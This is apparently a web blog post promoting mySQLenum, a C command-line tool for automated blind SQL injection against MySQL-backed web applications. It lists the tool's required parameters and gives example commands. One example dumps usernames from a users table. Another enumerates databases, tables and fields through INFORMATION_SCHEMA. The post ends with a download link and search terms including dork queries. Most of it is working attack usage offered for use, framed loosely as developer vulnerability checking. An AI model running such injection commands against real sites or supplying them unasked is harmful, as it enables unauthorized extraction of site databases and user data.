mySQLenum is a command line automatic blind sql injection tool for web application that uses MySql server as its back-end. Its main goal is to provide an easy to use command line interface.
Coded in pure c, does not depends on external library, is fast and support all MySQL versions.
It is easy and simple to use, all web application develops who use database can use this tool to simply run and find known vulneability.
Five necessary parameters:
–url: target URL
–sql-query: sql query to execute (or –macro to enter in Macro mode)
–param: vulnerable parameter
–param-value: a valid value to assign to parameter
–match-string: string to match in page content when the query is valid
How to use mySQLenum
mysqlenum –url=”http://www.oneexample.com/page.php” –sql-query=”select username from users” –param=page_id –param-value=1 –match-string=”Articolo 22″ –http-auth=”user:P4ssw0rd”
Query: select username from users
1) root
2) local
3) marco
4) luca
5) —
> Total requests: 192
> Data sent: 40 Kb
> Data received: 862 Kb
When above five parameter is not provided it automaticaly assumes.
- the request type is GET
- the webserver port is 80
- the charset used during the enumeration is included between – the ASCII values 32 and 122
we can use the CONCAT function to enumerate more fields with only one query:
One more macro mode example.
interactive Macro mode is possible to automatically enumerate:
- all available databases
- all tables of a specific database
- all fields of a specific table
the macro mode requires that the INFORMATION_SCHEMA is accessible.
mysqlenum –url=”http://www.example.com/page.php” –macro –param=page_id –param-value=1 –match-string=”Articolo 22″
Available macros:
1) Databases enumeration
2) Tables enumeration
3) Fields enumeration
Your choice: X
Databases:
1) information_schema
2) site
3) —
> Total requests: 227
> Data sent: 62 Kb
> Data received: 1066 Kb
Operating system supported
*nix Systems
Download mysqlenum Here
Searches leading to this post:blind sql injection tool, blind injection tool, Advanced SQL Injection Tool, blind sql injection tools for windows, blind sql tool, automatic sql injection 2010, automated blind injection, sql automatic injection tool, mysql blind injection tool, google dorks blind sql injection, sql injection enumeration tool, code php injection tool, sql injection tool 2010, SQl injector tool, automatic sql injection tool, tool Blind SQL, Automatic SQL and Blind SQL injection, automated blind sql injector, blind injector, SQL injection tools automatic
You must log in to post a comment.